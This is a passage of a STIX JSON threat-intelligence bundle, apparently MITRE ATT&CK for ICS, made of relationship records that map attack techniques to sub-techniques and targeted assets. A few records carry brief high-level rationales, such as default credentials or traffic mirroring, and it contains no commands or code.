"attack-pattern--aedfca76-3b30-4866-b2aa-0f1d7fd1e4b6", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--bcfbec44-1ed2-4555-8c60-4dd7452d3a3c", "created": "2020-03-27T21:30:51.231Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--365be77f-fc0e-42ee-bac8-4faf806d9336", "target_ref": "attack-pattern--457c7820-d331-465a-915e-42f85500ccc4", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--bd29b3ec-5dab-49fe-90ec-37f4c0a3f442", "created": "2020-10-02T16:59:56.765Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--91177e6d-b616-4a03-ba4b-f3b32f7dda75", "target_ref": "attack-pattern--55fc4df0-b42c-479a-b860-7a6761bcaad0", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--bd716844-74b1-4929-882f-5d85fcd2e836", "created": "2020-03-09T15:04:32.850Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--bf1b6176-597c-4600-bfcd-ac989670f96b", "target_ref": "attack-pattern--40597f16-0963-4249-bf4c-ac93b7fb9807", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--bd7509cc-a7e5-4e29-b615-225dfbdd3c4a", "created": "2023-09-28T21:16:24.310Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T21:16:24.310Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--2dc2b567-8821-49f9-9045-8740f3d0b958", "target_ref": "x-mitre-asset--ecb81a8b-022e-4529-a404-55cffca7d3a3", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--bd869385-5778-4303-8993-cc6412d12303", "created": "2023-09-29T18:45:59.108Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T18:45:59.108Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b52870cc-83f3-473c-b895-72d91751030b", "target_ref": "x-mitre-asset--f1315d02-9118-4e3b-8cdf-4c2d3f77ce41", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--be0f7d83-2441-4259-b411-46e0d10566b1", "created": "2023-10-02T20:23:24.179Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-10-02T20:23:24.179Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3b6b9246-43f8-4c69-ad7a-2b11cfe0a0d9", "target_ref": "x-mitre-asset--2b676abd-8263-49ea-81a4-78a7e1f776fe", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--be444020-9002-42c3-a68c-1591c0d1e9e2", "created": "2020-01-30T14:34:45.421Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--1365fe3b-0f50-455d-b4da-266ce31c23b0", "target_ref": "attack-pattern--67720091-eee3-4d2d-ae16-8264567f6f5b", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--be8cf250-e9ce-41a2-beb8-888795f6fc04", "created": "2020-02-10T20:49:13.031Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--e2907cea-4b43-4ed7-a570-0fdf0fbeea00", "target_ref": "attack-pattern--e51137a5-1cdc-499e-911a-abaedaa5ac86", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--beafc44c-228f-4a7e-9d92-ac1b16d730e2", "created": "2023-09-28T20:31:17.116Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T20:31:17.116Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b9160e77-ea9e-4ba9-b1c8-53a3c466b13d", "target_ref": "x-mitre-asset--75f810ad-b678-4c57-b93b-fdc79bba0c04", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--beb81712-cdbf-45bf-aa4e-c5d363d12ce3", "created": "2024-05-22T16:55:58.385Z", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-05-22T16:55:58.385Z", "description": "Asset Mapping Rationale: Adversaries may create a local account to maintain access to victim systems. Local accounts may also be added to network devices, often via common Network Device CLI commands such as username.", "relationship_type": "targets", "source_ref": "attack-pattern--25659dd6-ea12-45c4-97e6-381e3e4b593e", "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--bf5356b1-d00e-43c3-ba92-ae504a737d76", "created": "2023-09-29T16:46:12.472Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T16:46:12.472Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--8535b71e-3c12-4258-a4ab-40257a1becc4", "target_ref": "x-mitre-asset--69d1b1ef-e918-4cfd-9a98-29debd04cb32", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--bf8e68fe-1969-48d1-be0e-ec742378748d", "created": "2023-09-29T18:56:34.302Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2024-05-28T03:15:09.186Z", "description": "Asset Mapping Rationale: Adversaries may leverage manufacturer or supplier set default credentials on control system devices. Default credentials are normally documented in an instruction manual that is either packaged with the device, published online through official means, or published online through unofficial means.", "relationship_type": "targets", "source_ref": "attack-pattern--8bb4538f-f16f-49f0-a431-70b5444c7349", "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--bf8f90a2-4d3a-436d-87d0-eff060fb2302", "created": "2023-09-29T18:06:02.077Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T18:06:02.077Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--c5e3cdbc-0387-4be9-8f83-ff5c0865f377", "target_ref": "x-mitre-asset--3a95f7e4-4877-4967-b2e8-e287976c3e64", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--bf9f227c-e306-4257-add1-39c7c2e42040", "created": "2023-09-29T18:47:28.758Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T18:47:28.758Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3b6b9246-43f8-4c69-ad7a-2b11cfe0a0d9", "target_ref": "x-mitre-asset--f1315d02-9118-4e3b-8cdf-4c2d3f77ce41", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--bffad8de-a807-4216-9753-008a87d9d77f", "created": "2023-09-28T19:56:40.730Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T19:56:40.730Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--efbf7888-f61b-4572-9c80-7e2965c60707", "target_ref": "x-mitre-asset--986c455b-0f43-42b6-8360-33ac48bd9990", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c047df7c-3ed7-455f-8b13-14ced8e93fef", "created": "2023-09-28T21:17:47.080Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T21:17:47.080Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--cd2c76a4-5e23-4ca5-9c40-d5e0604f7101", "target_ref": "x-mitre-asset--ecb81a8b-022e-4529-a404-55cffca7d3a3", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c075f36d-2732-4258-b921-3f07845bc367", "created": "2020-02-11T18:59:50.162Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--69e5226d-05dc-4f15-95d7-44f5ed78d06e", "target_ref": "attack-pattern--bb5a00de-e086-4859-a231-fa793f6797e2", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c13b5c12-5a80-4012-b2d2-6642dd8ccf5c", "created": "2021-10-05T21:26:15.308Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--84601337-6a55-4ad7-9c35-79e0d1ea2ab3", "target_ref": "attack-pattern--1ecb2399-e8ba-4f6b-8ba7-5c27d49405cf", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c148030d-bbdf-4c8c-97da-0d44e3518aa9", "created": "2024-05-22T17:26:39.703Z", "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-05-28T03:16:13.639Z", "description": "Asset Mapping Rationale: Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Adversaries may also leverage a Network Device CLI on network devices to gather information about configurations and settings, such as IP addresses of configured interfaces and static/dynamic routes.", "relationship_type": "targets", "source_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0", "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c185a6ee-4897-49e0-801a-6c050054661f", "created": "2020-10-01T01:48:15.601Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--bbc3cba7-84ae-410d-b18b-16750731dfa2", "target_ref": "attack-pattern--edadea33-549c-4ed1-9783-8f5a5853cbdf", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c1c20b2c-0ae0-4ee4-863f-c82624fbcfe1", "created": "2021-03-30T17:20:05.938Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--b0c74ef9-c61e-4986-88cb-78da98a355ec", "target_ref": "attack-pattern--8c32eb4d-805f-4fc5-bf60-c4d476c131b5", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c1c5f193-6a20-4b6c-91c9-fb066bb73eca", "created": "2024-05-23T04:10:37.375Z", "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-05-28T03:17:14.260Z", "description": "Asset Mapping Rationale: Adversaries may leverage traffic mirroring in order to automate data exfiltration over compromised infrastructure.", "relationship_type": "targets", "source_ref": "attack-pattern--7c46b364-8496-4234-8a56-f7e6727e21e1", "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c1d77f83-23ec-4128-afd1-ed8ea12281a2", "created": "2023-09-29T18:09:02.311Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T18:09:02.311Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--8e7089d3-fba2-44f8-94a8-9a79c53920c4", "target_ref": "x-mitre-asset--3a95f7e4-4877-4967-b2e8-e287976c3e64", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c1e051ab-0a11-4d29-b98f-aa442ab69553", "created": "2023-09-29T17:09:48.178Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T17:09:48.178Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--5e0f75da-e108-4688-a6de-a4f07cc2cbe3", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c2168fe8-be19-4df5-808e-ed87c9c0e1c5", "created": "2023-09-29T16:28:39.397Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T16:28:39.397Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--8bb4538f-f16f-49f0-a431-70b5444c7349", "target_ref": "x-mitre-asset--973bc51e-c41e-4cec-ac03-9389c71f3d0d", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c233df49-e450-4151-8a0f-1765faf3d75a", "created": "2023-09-29T17:08:08.883Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T17:08:08.883Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--38213338-1aab-479d-949b-c81b66ccca5c", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c27e676e-1ac0-4ec8-bf9d-f540969c6b6f", "created": "2023-09-29T17:59:54.204Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T17:59:54.204Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--9f947a1c-3860-48a8-8af0-a2dfa3efde03", "target_ref": "x-mitre-asset--3a95f7e4-4877-4967-b2e8-e287976c3e64", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c2e18006-9caf-494c-9d41-4a4ef5b3bf78", "created": "2020-02-05T16:16:08.603Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--31a0a2ac-c67c-4a7e-b9ed-6a96477d4e8e", "target_ref": "attack-pattern--b83e166d-13d7-4b52-8677-dff90c548fd7", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c2f85446-52ef-4446-a5e4-5a6b691156ec", "created": "2020-10-19T16:48:08.551Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--4ffc1794-ec3b-45be-9e52-42dbcb2af2de", "target_ref": "attack-pattern--b8017880-4b1e-42de-ad10-ae7ac6705166", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c2fc4ab7-303c-4359-9504-c55e94ea9aab", "created": "2020-11-05T16:01:29.588Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--e0232cb0-ded5-4c2e-9dc7-2893142a5c11", "target_ref": "attack-pattern--1ecb2399-e8ba-4f6b-8ba7-5c27d49405cf", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c3499466-50f5-45fb-9fc0-14030e01822f", "created": "2022-06-15T18:00:04.357Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-06-15T18:00:04.357Z", "description": "", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--3975dbb5-0e1e-4f5b-bae1-cf2ab84b46dc", "target_ref": "attack-pattern--799ace7f-e227-4411-baa0-8868704f2a69", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c37f097a-9698-412f-9e96-4d350bcd2790", "created": "2023-09-29T16:44:26.728Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T16:44:26.728Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--25852363-5968-4673-b81d-341d5ed90bd1", "target_ref": "x-mitre-asset--69d1b1ef-e918-4cfd-9a98-29debd04cb32", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c39be68a-e208-47ac-a7be-6eb6e84d6608", "created": "2023-09-29T18:49:14.639Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T18:49:14.639Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--cd2c76a4-5e23-4ca5-9c40-d5e0604f7101", "target_ref": "x-mitre-asset--f1315d02-9118-4e3b-8cdf-4c2d3f77ce41", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c3d30e12-d4e1-468d-9142-3e925c38658e", "created": "2020-03-15T16:13:46.278Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161", "target_ref": "attack-pattern--355be19c-ffc9-46d5-8d50-d6a036c675b6", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c41d20c8-b99e-4de8-a0e5-3e0ef3b4275b", "created": "2023-10-02T20:21:06.420Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-10-02T20:21:06.420Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--5a2610f6-9fff-41e1-bc27-575ca20383d4", "target_ref": "x-mitre-asset--2b676abd-8263-49ea-81a4-78a7e1f776fe", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c4718fa2-2592-44b0-87d0-f866c118a779", "created": "2023-09-29T18:07:09.213Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T18:07:09.213Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--40b300ba-f553-48bf-862e-9471b220d455", "target_ref": "x-mitre-asset--3a95f7e4-4877-4967-b2e8-e287976c3e64", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c49f7336-749e-483b-8873-9283a377546d", "created": "2020-02-04T13:02:12.002Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--8187bd2a-866f-4457-9009-86b0ddedffa3", "target_ref": "attack-pattern--435dfb86-2697-4867-85b5-2fef496c0517", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c4a50132-a210-4093-878d-3d6df23ed26e", "created": "2023-09-29T17:10:09.146Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T17:10:09.146Z", "description": "", "relationship_type": "targets", "source_ref": 